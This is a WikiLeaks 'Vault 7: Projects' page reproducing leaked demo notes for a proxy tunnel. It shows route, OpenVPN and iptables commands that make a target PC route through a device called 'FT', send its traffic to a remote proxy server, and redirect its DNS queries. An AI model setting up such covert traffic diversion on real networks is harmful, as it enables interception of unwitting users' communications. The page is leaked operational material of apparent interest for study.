Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
Proxy Tunnel Demo Notes
Target/Demo network
Setup
1. Add the FT to the Target/Demo network
-option 1a) add a firewall between the FT and the internet.
2. Configure a Target PC to use the FT as it's gateway.
3. telnet into the FT
4. remove the default route and replace it with an network entry to get to the proxy server.
route del default gw X.X.X.X
route add -net 5.4.16.0 netmask 255.255.255.0 gw 10.1.1.1
5. On the proxy server:
echo 1 > /proc/sys/net/ipv4/ip_forward
#note: if using port 8080, make sure it is open in your servers fw after setting your IP
# demo: sudo /usr/sbin/openvpn --remote 5.4.16.62 --proto tcp-
server --port 8080 --dev tun --ifconfig 10.129.66.1 10.129.129.1
--ping 30 --user cbuser --group cbgroup --persist-key --verb 4
#TODO try, useful if using --user and we lost the privileges...
#persist-key, persist-tun, persist-local-ip
# if using –ping include --ping-restart
sudo /usr/sbin/openvpn --remote 5.4.16.62 --proto tcp-server
--port 8080 --dev tun --ifconfig 10.129.66.1 10.129.129.1
--route 10.129.129.0 255.255.255.0 10.129.129.1 --user nobody
--group nobody --persist-key --persist-tun –persist-local-ip
--verb 4
#enable NAT for TUN traffic on the proxy server:
iptables -t nat -A POSTROUTING -s 10.129.0.0/16 -o eth0 -j SNAT
--to 5.4.16.104
#enable DNS MASQUERADE to proxy DNS server, e.g. 4.2.2.1
iptables -t nat -I PREROUTING 1 -p udp --dport 53 -j DNAT –to
4.2.2.1
#setup virtual net IP for forward pinhole
# this cannot be done until the vpn tunnel is up for good